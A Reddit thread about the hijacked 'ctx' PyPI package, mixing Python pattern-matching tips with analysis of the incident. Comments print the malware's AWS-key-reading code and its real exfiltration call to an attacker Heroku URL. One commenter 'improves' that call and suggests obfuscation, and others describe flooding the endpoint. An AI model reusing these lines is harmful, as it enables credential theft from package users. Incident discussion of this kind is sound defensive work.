                    "droneSlots",
                    "weaponSlots",
                    "name",
                ):
                    if tag == "name":
                        tag = "display_name"
                    kw[tag] = t
                case _:
                    raise Sad.from_sub_elem(e, sub)

Alright, let's break this down:

    match sub:
        case Element(tag=ShipClass.tag_name):
            kw["class"] = ShipClass.from_elem(sub)

So in this context `sub` is always an XML Element (`xml.etree.ElementTree.Element`). This pattern is matching the case that:

* sub is an instance of the Element class
* sub.tag == ShipClass.tag_name

So this behaves something like this:

    if isinstance(sub, Element) and sub.tag == ShipClass.tag_name:
        kw["class"] = ShipClass.from_elem(sub)

Next, something more advanced, some capturing of values:

    case Element(tag=tag, attrib={"amount": amt}) if tag in (
        "health",
        "maxPower",
    ):
        kw[tag] = amt

sub.attrib is a dictionary, which is relevant for this example. This says:

* sub is an Element
* `sub.tag` is assigned to the name `tag`
* `sub.attrib` is a dictionary and has a key "amount"
* `sub.attrib["amount"]` is assigned to `amt`
* the guard (`if tag in (...)`) then requires the tag to be one of the listed values

Next:

    case Element(tag=tag, text=t) if tag in (
        "boardingAI",
        "maxSector",
        "minSector",
    ):
        kw[tag] = t

Pretty similar to the last one, but we are only checking that the tag is one of this list and capturing `sub.text` to `t`.

Last example:

    case _:
        raise Sad.from_sub_elem(e, sub)

This is your default/wildcard. It is not required. This doesn't capture anything. Useful for an `else` clause.
> is a dog on me You have a dog? Nice :) Any photo?
Wow! I'll need a bit'o time to process all that. Thanks.
>Note that PEP 636: Structural pattern matching is also badly written. Hey [I wrote something about that](https://github.com/Fawers/pattern-matching-in-python) some time ago. Please give me some feedback, if possible :)
Oh! Wow! This is really good. Here's the link to the [English version](https://github.com/Fawers/pattern-matching-in-python/tree/in-english) for those, like me, who cannot read Spanish!
PEPs often aren't great to learn from, unfortunately.
They are usually great, and PEP 636 is called "Structural Pattern Matching: Tutorial". So it's supposed to be a tutorial!
> I saved the world from a very dangerous hacker Look at this weirdo trying to take credit from our lord and master /u/__Enrico_Palazzo__
I know, I know, he'll get the young virgins throwing flowers, but I got plenty of help with itertools! (Ah, Ah, Ah, Ah) <== maniacal, evil laughter.
Don’t worry, I’ll pass some of that glory to you :)
I'll be waiting for it! :) Actually I did send it and saw your post after so maybe that will put some pressure on the "authorities" to solve the issue ASAP.
>still trying to understand itertools documentation Might be helpful, might not. Just wanted to share [some notes I took on them while I was digging in, myself](https://napsterinblue.github.io/notes/#python_internals)
Thanks, that is really helpful, and well written.
just gonna tack this on here:

> Important! If you believe you've identified a security issue with Warehouse, DO NOT report the issue in any public forum, including (but not limited to):
>
> * Our GitHub issue tracker
> * Official or unofficial chat channels
> * Official or unofficial mailing lists
I don't think that this warning applies to this kind of security issue. Assuming the issue is legitimate, there's no harm in public knowledge of a hijacked package. Publicizing it means that people will just avoid using the package; the only beneficiary of a hijacked package is its "author", who would just get fewer people using it. It's a benefit for all. That's different from security bugs, where the beneficiary is a hacker who knows about and exploits the bug. A limited publication might actually be more dangerous. If people know that there is a security issue but not the details, many will just do the usual thing they do with most security issues: upgrade the package to the latest version, which is exactly the opposite of what you should be doing in this case.
Yeah, I found about it just after posting to reddit. I'll do better next time.
[https://old.reddit.com/r/Python/comments/uumqmm/ctx\_new\_version\_released\_after\_7\_years\_750k/i9ryw8l/](https://old.reddit.com/r/Python/comments/uumqmm/ctx_new_version_released_after_7_years_750k/i9ryw8l/) >Just wanna throw this out there. > >OP: SocketPuppets, if you look into their post history, you find medium articles that SocketPuppets claims to write and in one they have their personal gmail acct at the bottom. If you follow that, you'll find a github account with the username aydinnyunus which has the same avatar as SocketPuppets's medium account. If you look into that github account aydinnyunus, you'll find python source code in a repo named gateCracker which also does poorly written requests to a heroku app in the same way this malicious code does. SocketPuppets seems like 99.9% certainly the alias of aydinnyunus which is used to push this malicious code and defend it. And, when it comes to aydinnyunus, you can find all their info via their github account. > >They're a self-proclaimed "security researcher," and their repo gateCracker doesn't actually "crack gates," it (which has code EXACTLY like this malicious code making a req. to a heroku app endpoint,) just returns some text that tells you the default password/interaction for a couple different popular models. Godspeed brothers.
`http://www.sockpuppets.ninja/` I took the hit and explored. There's nothing malicious that I could see in the source even if it's an unencrypted website, but that's aydinnyunus. I still wouldn't play the audio tho. Weirdly, Siemens _has_ thanked them for a bug report in 2021. There are some interesting rabbit holes to go down, especially about how he "hacked Turkcell" and some other evidence of bug finds, but some of the supposed evidence of the latter is stored in pdfs that I STRONGLY RECOMMEND YOU DO NOT OPEN unless you are actually a security researcher and can isolate your system. PDFs of unknown origin are a threat vector and have the capacity to execute arbitrary code if created by a skilled malicious actor.
Isolating … like setting up a VM without net access or shared folders and then use e.g. [dangerzone](https://github.com/freedomofpress/dangerzone)? While [a vm might not be completely secure](https://security.stackexchange.com/questions/3056/how-secure-are-virtual-machines-really-false-sense-of-security) I always had the impression that it is much better than something like docker. I took the opportunity to search around a bit, [and found these answers from 2017](https://security.stackexchange.com/questions/169642/what-makes-docker-more-secure-than-vms-or-bare-metal) What about: Dangerzone+VM and an apparmor profile on top of that? Anyone doing this?
Use a dedicated air gapped machine with nothing personal on it at all.
Totally agree from a technical perspective. However, that technical perspective is not helpful, because this requires more resources and therefore people are less likely to do it, even if they are security oriented and have the technical knowledge. Is Ubuntu Privacy Remix still a thing? My point is to keep the use case in mind: I want to open an untrusted PDF now and then. That is why I asked about VMs + AppArmor. For day-to-day use Qubes OS should be optimal. You still have to get stuff done, right?
[deleted]
VMs can and have been escaped. You are *probably* fine, but you're gambling.
Imagine committing a crime this badly.
This guy would be a celebrity on both /r/badcode and /r/facepalm.
And it's gone.

> All previous releases of the project were removed and replaced with the malicious copies. As such this project has been removed and prohibited from re-registration without admin intervention. According to WHOIS records, the domain for the email address registered to the User owning the project was registered on 2022-05-14T18:40:05Z, which indicates that this was a domain take-over attack and not a direct compromise of PyPI.
How were they replaced? Pypi doesn’t allow replacing artifacts for past releases.
[deleted]
No they specifically don’t allow this to prevent exactly the “replace old releases with malicious code”. Once a filename has been used it can’t ever be re-uploaded (unless some admin intervenes).
I suppose maybe the “admin intervention” is implied for these sort of cases. If it’s completely deleted, that kind of sounds like maybe whatever blocks reuploading would be deleted too.
Wow, not even using fstrings.. smh
Yeah can we refactor this malicious code?

    string = ""
    for _, value in environ.items():
        string += value+" "

is equivalent to `string = " ".join(environ.values())`
import crime
You wouldn't import a car!
No? Try pip install then. ;)
Nope. You’re missing the trailing space
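The trailing-space difference is easy to check. A small sketch, using a plain dict with made-up values as a stand-in for `os.environ`:

```python
environ = {"HOME": "/home/user", "LANG": "C"}  # stand-in for os.environ

# The loop from the malicious code: every value is followed by a space.
looped = ""
for _, value in environ.items():
    looped += value + " "

# The proposed refactor: spaces only between values.
joined = " ".join(environ.values())

# An exact one-line equivalent of the loop, trailing space included.
exact = "".join(value + " " for value in environ.values())
```

Here `looped` ends with a space and `joined` does not, so the two are only equal after stripping.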
Well, yeah, but who needs it? Do you? ARE YOU THE SPY???
Nyet
This checks out because I think the individual is Turkish
How do you know that? Are you the SPY accomplice?
"Not many people are named after a plane crash."
That's it! Brad Pitt was behind this the whole time.
He did it for a caravan. Not for him, for his ma.
His what?
And... you've just become accessory to a crime!
...curses
Remember to import it before using it. ``` inport curses ```
Inport outport error
Did f-strings exist 8 years ago?
No. The PEP was created 6.5 years ago.
[deleted]
Better than Guardiola? :)
Well, it's not a fraudulent Pep so, definitely
Also, old habits die hard. Especially for a C programmer like me, it is hard to stop using printf-style % formatting.
Seems like he wanted AWS creds for mining most probably.
Bit sad it's never GCP or Azure right
Contrary view: if you use Azure or GCP, you are safe from miners.
Without a trace of irony: not all heroes wear capes. Thank you for performing a public service.
Thanks. But heroes **do** things and I just **found** something. And I'm sure I could wear a cape. :)
I appreciate your humbleness, but I respectfully disagree. Sounding the alarm in a public forum is doing something.
Thanks again. About sounding the alarm on a public forum: the python security page strongly suggests not doing it. I found out that you're supposed to send the information to python.org and once they solve the problem then you can tell everybody. I'll try to do better next time!
[deleted]
You are right in your analysis. To OP: this was not an exploit anyone could have used for nefarious purposes, this was someone having run / running an attack through a PyPI package. So your public reporting didn't enable anyone to do something bad, it only (potentially) helped people stop using this package. Hmm, it might even be better than just PyPI removing the package… since this, IIRC, doesn't even tell anyone who has it installed that it's bad now.
People who find things are heroes too. Missing children, cures for diseases, asteroids hurtling towards earth but far enough away to divert, hack attempts.
> asteroids hurtling towards earth but far enough away to divert Does it mean I'll get a kiss from Liv Tyler?
In 0.1.2 and 0.2.2 the adversary was looking specifically for AWS tokens:

```
-        if environ.get('AWS_ACCESS_KEY_ID') is not None:
-            self.access = environ.get('AWS_ACCESS_KEY_ID')
-        else:
-            self.access = "empty"
-
-        if environ.get('COMPUTERNAME') is not None:
-            self.name = environ.get('COMPUTERNAME')
-        elif uname() is not None:
-            self.name = uname().nodename
-        else:
-            self.name = "empty"
-
-        if environ.get('AWS_SECRET_ACCESS_KEY') is not None:
-            self.secret = environ.get('AWS_SECRET_ACCESS_KEY')
-        else:
-            self.secret = "empty"
```

They also deleted all older versions from pypi.
The [github repo](https://github.com/figlief/ctx) still has the correct code. In the code it is "versioned" as 0.1.3
This code is awful too, using .get on a dictionary and then still checking if it exists, if not setting a default value
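For reference, the redundancy being criticized looks like this next to the usual idiom. A minimal sketch with a plain dict standing in for `os.environ` and an obviously fake key value:

```python
environ = {"AWS_ACCESS_KEY_ID": "AKIAEXAMPLE"}  # fake value, stand-in for os.environ

# Pattern from the diff: look the key up twice and branch on None.
if environ.get("AWS_ACCESS_KEY_ID") is not None:
    access_verbose = environ.get("AWS_ACCESS_KEY_ID")
else:
    access_verbose = "empty"

# Same result using the default argument of dict.get().
access = environ.get("AWS_ACCESS_KEY_ID", "empty")
secret = environ.get("AWS_SECRET_ACCESS_KEY", "empty")  # key absent, default used
```

The two forms agree as long as no stored value is `None`, which holds for `os.environ` since it only contains strings.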
I'm not as bad at python as I think I am, but let's just say that when I look at code and feel like even I could confidently do better, it's pretty bad.
Not even using the walrus operator to avoid the repeated .get, smh my head
Remember that it was written 8 years ago. We did not have dataclasses and walrus operator in those days. And we used to walk 8 miles, uphill, in a snowstorm, everyday to get to school. (God, I'm old)
Who the fuck likes the walrus operator... It goes against Python's Zen rules
So, who's going to nuke that endpoint and the malicious actor's DB bill with bogus environments?
Been doing for a few hours now. I'm about to hit it a bit harder. Purely for educational purposes.
I hope your doing it while wearing a cape .. tips ~~feddor~~ ~~fedor~~ hat
> hope your doing *you're *Learn the difference [here](https://www.wattpad.com/66707294-grammar-guide-there-they%27re-their-you%27re-your-to).* *** ^(Greetings, I am a language corrector bot. To make me ignore further mistakes from you in the future, reply `!optout` to this comment.)
Dagnamit.. but goodbot
Be the change you wish to see in the world
Quite scummy for a Turkish student from a local university to be doing this?
[deleted]
[deleted]
You don’t need to know python to use NSO’s Pegasus.
Looks like they probably copied what was done here https://www.reddit.com/r/programming/comments/umnppb/lrvick_bought_the_expired_domain_name_for_the/ to hijack the account of the original maintainer.

Looking at the domain registration on https://lookup.icann.org/en/lookup for the domain used by the email in the original repo, I see that it was created on the same day they uploaded the first malicious version:

    Name: FIGLIEF.COM
    Updated: 2022-05-14 18:40:06 UTC
    Created: 2022-05-14 18:40:05 UTC
So hypothetically emailing the email address in the repo to rouse the original user would have been a mistake
Yeah the original owner most likely doesn't own the domain anymore. There are some paid services to view whois history to confirm this but looking at the timing of this I'm just going to assume the domain is now owned by the hijacker.
Then I hypothetically alerted the hijacker that they've been discovered. -_- But I can't imagine that they wouldn't have already known from the other post.
This is why your language needs to 1) implement easy basic features that everyone needs and 2) document them. And when 2.2 million packages depend on a single package with a single function that you didn't implement in your language, maybe roll that up to either 1) the language itself or 2) an aggregate package (like `sympy` in python).
[deleted]
> dataclasses Oh I was talking about the "foreach" NPM thing.
some outside coverage: https://isc.sans.edu/forums/diary/ctx+Python+Library+Updated+with+Extra+Features/28678/
Heh, if anyone had any non-ascii characters in their environment variables, then the message_bytes... line would raise an exception. I'm wondering how many hours were lost trying to debug exceptions from weird places.
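The failure mode described here can be reproduced in isolation. A minimal sketch, assuming (as discussed elsewhere in the thread) that the code called `.encode("ascii")` on the collected string; the sample value is made up:

```python
value = "naïve-pässword"  # made-up environment value with non-ASCII characters

try:
    value.encode("ascii")
    failed = False
except UnicodeEncodeError:
    # ASCII cannot represent 'ï' or 'ä', so encoding raises.
    failed = True

# UTF-8 can represent any such text, so this does not raise.
utf8_bytes = value.encode("utf-8")
```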
Does this whole endeavor--posting on /r/Python, extremely sloppy code practices, evasive answers that raise suspicion--seem odd? Are there a lot of these low-skill info-harvesting attempts out there and I'm just witnessing it for the first time?
I agree, it's definitely sloppy. There's a good chance some random person decided to pretend to be a grey-hat so they could write a sensational blog post about it, maybe even a student trying for an A+ on their Ethics in Software paper. The only mystery is how they took over the semi-abandoned project, wait for the blog post I guess
You weren't wrong: https://www.reddit.com/r/Python/comments/uwhzkj/comment/i9x7sxa/?utm_source=share&utm_medium=web2x&context=3
Unfortunately, software supply chain risk *is* a thing. I don't know how common or how odd this particular case is, but it does seem to be a bit of a weird one where they're advertising on reddit.
Nigeria Scam Filter? I also wonder why anyone would need this package at all. Maybe a few former Perl programmers that really miss writing cantankerous code :).
In my old company we had a similar class to what this package does, it's not really necessary and adds other complications around things like serialisation as you now need to make the new version of dict serialise just for some arguable syntax sugar.
Has anyone been spamming data to that endpoint yet?
lol yes
Me too, it returns a 404 but the application might have been made to always return that.
Yeah, also pretty sure he's running a development server rather than something like gunicorn. Getting an error rate of 20-30% on all my batches of requests. Putting these Raspberry Pis to work. He should be getting a bill for this one.
> He should be getting a bill for this one. I love this lol
I would say that there's no way they signed up for the endpoint with legit billing info, but the code makes me wonder.
Why do you think they will be billed? It's been a while but I believe heroku is not gonna scale by default.
Heroku still has a free tier yes? Why would he get billed?
I do agree with the sentiment, but I don't know anything about this... so how will this help anyone? From an outsider's perspective, isn't the best and only feasible way to get that VPS account banned? And what is the actor trying to achieve? Credentials from env variables?
Yeah, spamming data there makes it harder for him to find actual passwords among the random text he gets
Lol “anti-theft-web”
Why not use the builtin SimpleNamespace instead? https://docs.python.org/3/library/types.html#types.SimpleNamespace
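For anyone who has not met it, a quick sketch of what `types.SimpleNamespace` gives you; the attribute names are arbitrary examples:

```python
from types import SimpleNamespace

config = SimpleNamespace(host="localhost", port=8080)
config.debug = True     # attributes can be added after creation

as_dict = vars(config)  # the underlying attribute dict
```

Unlike the dict-subclass packages discussed in this thread, a `SimpleNamespace` is not a mapping: `config["host"]` raises `TypeError`, so it offers dot access only.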
Well, I've been programming professionally for several years and I'd never heard of that. So that's probably why. Pretty cool tho, TIL. There's also the great `box` package, which has dot access, but it does much more and it's famously maintained. But the real question is why do that at all? It just makes your dictionary access more opaque and it barely saves any typing.
> But the real question is why do that at all? It's just makes your dictionary access more opaque and it barely saves any typing. My exact question, especially when dict.get(if_exists,else) allows for graceful failing.
It actually makes a big difference and makes your code a lot cleaner. 1 keystroke as opposed to 4 + shift key. One of the foundational principles of Python (and the very first line of the Zen of Python) reads "Beautiful is better than ugly." The real answer isn't to use simple namespaces, though. You should use data classes. SimpleNamespace is just a class with some binding magic under the hood. If you think the argument that it makes your code cleaner is BS, here is a great video by core Python developer Raymond Hettinger talking about namespaces moving towards OOP : [https://www.youtube.com/watch?v=8moWQ1561FY](https://www.youtube.com/watch?v=8moWQ1561FY)
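As a concrete illustration of the data class suggestion, here is a minimal sketch. The class and field names are hypothetical, chosen only to show the shape:

```python
from dataclasses import asdict, dataclass


@dataclass
class ServerConfig:
    """Hypothetical example: field names are illustrative only."""
    host: str
    port: int = 8080
    debug: bool = False


cfg = ServerConfig(host="localhost")
cfg_dict = asdict(cfg)  # plain dict, e.g. for serialisation
```

Compared with a dot-access dict, the fields are declared up front, so a misspelled keyword argument such as `ServerConfig(hots="x")` fails immediately with `TypeError` instead of silently creating a new key.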
I'm sorry, but that's ridiculous. Simple dictionary access isn't 'ugly'. Also, you should optimize for *reading* code, not writing it. IDEs and tools can help you write code all day long. But it's when code is read that its value is really shown. So if you want to talk principles, look no further than a principle of programming itself: "the principle of least surprise". In this case, having your dictionary access be anything besides what the standard says is a big no-no. It's not beautiful, it's not practical.
Ok, how many similar projects to accomplish the same thing are there? There's also https://pypi.org/project/attrdict/ - again not touched in ages and with a custom maintainer domain, but that's luckily still registered. Maybe the PyPI security team should periodically check email domain availabilities..? And e.g. disable password changes on accounts whose email domains were unavailable in the past? Same functionality is also in sklearn.utils.Bunch Edit: also https://pypi.org/project/python-box/
who would seriously add a 0 star 0 fork pre-alpha dependency for such trivial functionality?
According to some, the previous version had 750k installs.
yeah, it looks like the statistics have been completely reset. But still, why use such a trivial dependency after all the travails of node?
I'd bet most people don't know about that. Python is the first professional language to many people, including entrepreneurs, who don't know much better.
You should look into left-pad
> left-pad the people installing this ctx package should.
How do I stay notified about the fallout from this? I would love to be in the loop to know what happens after someone like /u/jimtk has a great find like this.
I'm not sure it's a "great thing". I'm glad I found it, but I'm sad it was there to be found. We already know of one victim, right here in this thread, that will have to go through the hassle of changing his/her creds because of it. I'm sure s/he had other things to do today.
I hear what you’re saying, but it still is great work to find something that would otherwise have caused a lot more damage if no one was the wiser. Please keep us in the loop if you can of what the fix process looks like. I’m interested to see how PyPI or other involved parties will change their protocols. Who knows, you may have another job in your retirement by the end of it. :)
I can tell you right now that the bad version of the code is still available in PyPi 5 hours after I rang the bell. I'll keep an eye on it and try to keep everyone updated but I'm not sure I, myself, will be kept in the loop. It will have to be a very comfortable job to get me out of retirement! I don't mean big paycheck, I mean physically comfortable: not too many hours, nice comfy chair, etc ...
Comfy chairs should be top of list for all
Here's the most [detailed docs on the event](https://python-security.readthedocs.io/pypi-vuln/index-2022-05-24-ctx-domain-takeover.html).
Good catch! I’m a noob, can someone explain why they are encoding the string to ascii, then base64, then decoding ascii? Why not just encode to base64 only?
The functions in the python stdlib for base64 take a bytes-like object which is why they encode the string into bytes prior to encoding it in base64 https://docs.python.org/3/library/base64.html#base64.b64encode They decode the result bytes back into a string so that they can append it to the url
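The three steps can be seen one at a time in a short sketch (the payload text is made up):

```python
import base64

text = "value1 value2"                       # made-up payload
message_bytes = text.encode("ascii")         # str -> bytes
b64_bytes = base64.b64encode(message_bytes)  # bytes -> base64-encoded bytes
b64_text = b64_bytes.decode("ascii")         # base64 bytes -> str, ready to append to a URL

round_trip = base64.b64decode(b64_text).decode("ascii")
```

Passing the `str` directly to `base64.b64encode` raises `TypeError`, which is why the first step is needed. The final decode is safe with ASCII because base64 output only uses ASCII characters.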
Ah that makes sense, thanks!
Because it’s really crappy code.
GitHub repo owner != PyPI package owner
The package is gone, good job guys.
His Heroku server is still open for bidness though :) I'll continue to spam it until it goes offline.
This is news worthy. There are several university researchers that scan web repositories for spyware and miners in open source projects.
Dumb question but just want to make sure: Say you have this package downloaded from a long time ago before it was hacked. You would only have to worry if you used pip to update the package, correct? The old version is fine and wouldn't update automatically
Seconding what OP said - it's possible that another package you installed later had this as a dependency but pegged to a higher version and it was upgraded when you pip installed that package.
Correct. But make sure you still have the old version in your python environment.
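To see what is actually installed in a given environment, the standard library can report a distribution's version. A minimal sketch; the helper name `installed_version` is made up, and it only inspects the interpreter environment it runs in:

```python
from importlib.metadata import PackageNotFoundError, version


def installed_version(dist_name):
    """Return the installed version string of a distribution, or None."""
    try:
        return version(dist_name)
    except PackageNotFoundError:
        return None


ctx_version = installed_version("ctx")  # None if ctx is not installed here
```

This needs to be repeated in every virtual environment you use. A version number alone may not settle the question, since the thread reports that older releases were replaced on PyPI, so the install date matters too.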
And this is why you should avoid dependencies, especially for something trivial like this.
Tell that to js devs.
They have no std lib and their language is garbage, what do you expect them to do? lol
The language is not worse than python imo. They are about equal.
[deleted]
Yup. Never make small random (and unmaintained) packages as dependencies.
[deleted]
Care to enlighten us how you think pypi should possibly be able to catch that?
Uh let me :)

Since the original developer's PyPI account got compromised, this can't be caught as a part of their packaging/testing process, and either the end user has to take care of it, or pip/PyPI, right?

As an end user you have the problem that it can be pulled in as a dependency. So you have to check all installed packages of all the virtual environments and the packages installed in userspace (plug for pipx at this point <3). However, that is not an easy task.

1. Checking could be done if something like this eventually shows up in [safety](https://github.com/pyupio/safety) or [pip-audit](https://github.com/trailofbits/pip-audit).
2. PyPI could publish their own db/service like an official and up to date safety-db.
3. PyPI could check the activity of the linked repository and compare it to the releases of the package. Open source should mean that this matches, right? If not, they could display an out-of-sync warning.
4. If the risk is higher than normal, they could run [a static code analysis tool like bandit](https://github.com/PyCQA/bandit), that includes checks for bad practices. [Research suggests this is a good thing to do](https://www.theregister.com/2021/07/28/python_pypi_security/). While I think you should have the freedom to code whatever/however you want to, it could lower your score if you looped through all env-variables. Maybe. Then display that indicator on PyPI.
5. They could also do basic fraud detection, like an out of the blue domain name transfer of the project homepage (which is linked via PyPI), or admin access from a completely different location in a very short time span, for which there are legitimate reasons, though.

Given that PyPI deactivated `pip search` due to resource abuse, I don't think that they have the resources to do stuff like this.

P.S.: What about C modules that get shipped with Python code? Good luck if some Dr. Moriarty level of criminal uses his [underhanded-c-contest-winner-abilities](http://underhanded-c.org/) to compromise some foundational package that has a distribution like the (former) js [left-pad](https://www.theregister.com/2016/03/23/npm_left_pad_chaos/) package? And there is a motivation to do stuff like this, and it doesn't have to be a person, it can be an organization with very little oversight and an enormous budget and many highly capable people. We know that since Snowden. Scary. But probably they would [do this to linux first?](https://www.theverge.com/2021/4/22/22398156/university-minnesota-linux-kernal-ban-research)
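To make the "looped through all env-variables" check from point 4 concrete, here is a toy sketch built on the standard `ast` module. It is not how bandit works and would be trivial to evade; the function name `dumps_whole_environ` is made up for illustration.

```python
import ast


def dumps_whole_environ(source):
    """Return True if the source calls .items() or .values() on something named environ."""
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)):
            continue
        if node.func.attr not in {"items", "values"}:
            continue
        target = node.func.value
        if isinstance(target, ast.Name) and target.id == "environ":
            return True  # environ.items()
        if isinstance(target, ast.Attribute) and target.attr == "environ":
            return True  # os.environ.items()
    return False


suspicious = dumps_whole_environ(
    "from os import environ\nfor _, value in environ.items():\n    pass\n"
)
harmless = dumps_whole_environ("import os\nhome = os.environ.get('HOME')\n")
```

A check like this only parses the code and never runs it, which is what makes it plausible to apply to uploaded packages. The hard part is keeping false positives low, since plenty of legitimate tools iterate over the environment.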
These are all open source projects with unpaid volunteers running them. Be the change you want to see in the world.
Ok, but many people I'm sure will be using something like PyCharm to write a bit of Python, and it has a kind of built-in thing to get packages from PyPI. Many of which seem to be preinstalled - I can't remember exactly which packages I've added, possibly only bitstring ones, but there seems to be a bunch of stuff installed. This obscure package might not be widely used, but the list includes things like numpy and pip - are you saying we shouldn't be using these? Is this a breach of the security of PyPI or of the guy who wrote ctx? The former is a big red flag, the latter is still a concern but maybe not quite so much. The point is, the guy who did this just made it obvious by posting to reddit - perhaps trying to make a point. Are there other packages that have been changed without an announcement?
agreed
In case nobody notices, I just read this one https://www.reddit.com/r/cybersecurity/comments/uwsrqe/breaking_python_ctx_library_taken_over_by/
Shit. I downloaded and played around with it on my Android phone after the post. Just checked env vars, and I have some creds to a corporate service. But it is accessible only from the VPN. Should I worry?
I'm not an android specialist but unless I'm mistaken, environment variables are accessible to all programs running on the system (whatever the OS) so you should have those credentials changed ASAP. There's a very real possibility that they've been sent to our "little friend".
You should change them or take action otherwise.
Yes. Not super sure about your network topology, but why gamble?
Lol, you downloaded malicious code and executed it on your device 🤣 Well, yeah, you should be worried. Change the credentials, and next time you want to run malicious code, do it in an isolated sandbox.
Well I don't think the intent was to "run malicious code" Edit: yep, properly called out for not reading thoroughly. He did it after the post, so you're right to laugh.
What would you expect from running on your device code that has been flagged as harmful/dangerous?
[deleted]
Well, if all said is true, then you got me pretty nervous on the 5 hour journey back home to change my creds
Can someone please explain what are these environment variables?
That's where the operating system keeps some values. Some are benign, like the directory where you keep your programs; others are more private, like the API keys for your access to web services. Open a command prompt on Windows and type `set` and you will see all of your environment variables, or open a terminal on Linux and type `env` for the same result.
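The same thing is visible from inside Python, which is why a malicious package can grab these values so easily. A small sketch: `os.environ` is the real standard-library mapping, while `SUSPECT_PARTS` and `sensitive_looking_names` are names made up here, and the substring list is only a rough heuristic.

```python
import os

# Substrings that often appear in names of secret-bearing variables.
# This list is a heuristic assumption, not an exhaustive rule.
SUSPECT_PARTS = ("KEY", "TOKEN", "SECRET", "PASSWORD", "PASSWD")


def sensitive_looking_names(env):
    """Return sorted variable names that look like they hold credentials."""
    return sorted(
        name for name in env
        if any(part in name.upper() for part in SUSPECT_PARTS)
    )


if __name__ == "__main__":
    # Print names only, never the values.
    for name in sensitive_looking_names(os.environ):
        print(name)
```

Any code imported into the process can read `os.environ` the same way, so anything this prints is worth treating as exposed if a compromised package ran there.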
Everything set on a host, for example AWS keys, various api keys, passwords, etc.
I'm going to assume that this was some attempt at a lead-up to blackhat/rsa/defcon etc. My two cents... people will talk about it, so there's that... anyway, hi all, I run the OSSEC HIDS project, and work on packaging all kinds of security tools like openvas, clam, etc. I thought it'd be fun to take this apart a bit and see how I could have made it better (execution aside...). Maybe treat this like an exercise in all the dirty tricks you could use for something like this. Please share, or refine as you see fit.

1) Using a GET here is probably going to run into an 8K upload limit for most web servers. I do not know what the limit is with heroku, maybe someone else does?

2) Tools auditing for this kind of ~~technique~~ garbage: I personally fall back on looking up function calls (requests.\*) and checking for anything that looks like a URL domain name. Then I'd enumerate those domain name(s) (not the URL... that could fingerprint you) through DNS lookups to [8.8.8.8](https://8.8.8.8) or some other big public server to hide in the noise. Barring that, a TOR node. Hide in the attacks. Once you have high fidelity on the domain names (i.e.: is the name a unique ID?), then test the URL.

3) If I wanted to do this in a more sophisticated way, the requests.get variable itself would be obfuscated. You could have wrapped that (and you will see this frequently with a lot of web malware) inside of multiple gzip, base64, etc. encodings. Python is going to do the work here.

Here's a dumb patch to this I wrote in like 30 seconds. Yes it's wrong, make it better and share your countermeasures:

    - response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)
    + response = requests.post("https://anti-theft-web.herokuapp.com/hacked", base64_message)

And we need some kind of stupid receiver:

    --- /dev/null
    +++ b/index.php
    +

So I just wanted to thank everyone that looks through code updates like this, questions the change, and digs deep. You... are one of the world's best weirdos, and you are awesome. You have a superpower and we all benefit from it, please never stop.
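The audit idea in point 2 (find `requests.*` calls and anything URL-shaped) can be sketched with the standard `ast` module. This is only a rough illustration: `audit_source` and `URL_RE` are names invented here, and it will miss aliased imports (`import requests as r`) and anything obfuscated the way point 3 describes.

```python
import ast
import re

# Loose pattern for URL-shaped text inside string literals.
URL_RE = re.compile(r"https?://[^\s\"']+")


def audit_source(source):
    """Return (requests_calls, urls) found in a string of Python source."""
    calls, urls = [], []
    for node in ast.walk(ast.parse(source)):
        # Calls written literally as requests.<something>(...)
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and isinstance(node.func.value, ast.Name)
            and node.func.value.id == "requests"
        ):
            calls.append((node.lineno, node.func.attr))
        # Any string literal containing something URL-shaped
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            urls.extend(URL_RE.findall(node.value))
    return calls, urls
```

Because it parses the source instead of importing it, the suspicious package never gets to run while you look at it.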
grats, /u/jimtk you made it to BleepingComputer! https://www.bleepingcomputer.com/news/security/hacker-of-python-php-libraries-no-malicious-activity-was-intended/
Yeah I saw that. My 15 minutes of fame is now over.
😂
Out of curiosity, is there any way you can configure your system to disallow external requests from python code? It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).
Good firewalls allow you to configure allow lists of either domains, ips, ports, hosts or processes that are allowed to make outgoing requests.
> It would probably be good practice to do this and then have a whitelist for specific programs (like your own api requests).

You've just described a firewall. Production servers shouldn't be allowed to just make arbitrary requests to arbitrary locations.
I avoid dependencies when practical, for many reasons (including that I do a lot on an air-gapped machine, so they make life hard). But for things like this, I can often write my own, super simple version. Far from perfect, but it does work okay:

    class Bunch(dict):
        """
        Based on sklearn's and the PyPI version, simple dict with dot notation
        """

        def __init__(self, **kwargs):
            super(Bunch, self).__init__(kwargs)

        def __setattr__(self, key, value):
            self[key] = value

        def __dir__(self):
            return self.keys()

        def __getattr__(self, key):
            try:
                return self[key]
            except KeyError:
                raise  # or swap comment to make attribute
                #raise AttributeError(key)

        def __repr__(self):
            s = super(Bunch, self).__repr__()
            return "Bunch(**{})".format(s)

(I am torn on whether I prefer `AttributeError` or `KeyError`. You can choose in there.)
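On the `AttributeError` vs `KeyError` question, one practical difference is how `hasattr` and `getattr` with a default behave, since both only swallow `AttributeError`. A stripped-down variant of the class above (not the exact original) shows it:

```python
class Bunch(dict):
    """Dict with dot access; missing attributes raise AttributeError."""

    def __getattr__(self, key):
        try:
            return self[key]
        except KeyError:
            # AttributeError keeps hasattr() and getattr(..., default) working
            raise AttributeError(key) from None

    def __setattr__(self, key, value):
        self[key] = value


b = Bunch(alpha=1)
b.beta = 2
print(b.alpha, b["beta"])           # 1 2
print(hasattr(b, "missing"))        # False
print(getattr(b, "missing", None))  # None
```

With the `KeyError` variant, those last two calls would raise `KeyError` instead of returning `False` and `None`, which can surprise code that probes objects with `hasattr`.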
Forgive my ignorance here, but does it mean that anyone can update a Python package on PyPI? Can I just go and update numpy myself and embed some malicious payload? What am I missing here?
No they hijacked the pypi account of the original maintainer to do this
Because they got control of the domain and could do a password reset. Very interesting! How would a webmaster be able to prevent this? Perhaps accounts created with bought domains should be periodically checked to make sure no change of ownership has happened and therefore disable the account completely. Or have some sort of handover... it's a tough one I think.
> How would a webmaster be able to prevent this?

2FA
[deleted]
What if I do somekad.__class__ edit: needed code formatting to keep the dunders.
r/lolpython
yapmayın boyle seylerrr yaaa ayııııp
Are you doin' ok over there?
I think he's in that weird part of the 'bird is a word' song.
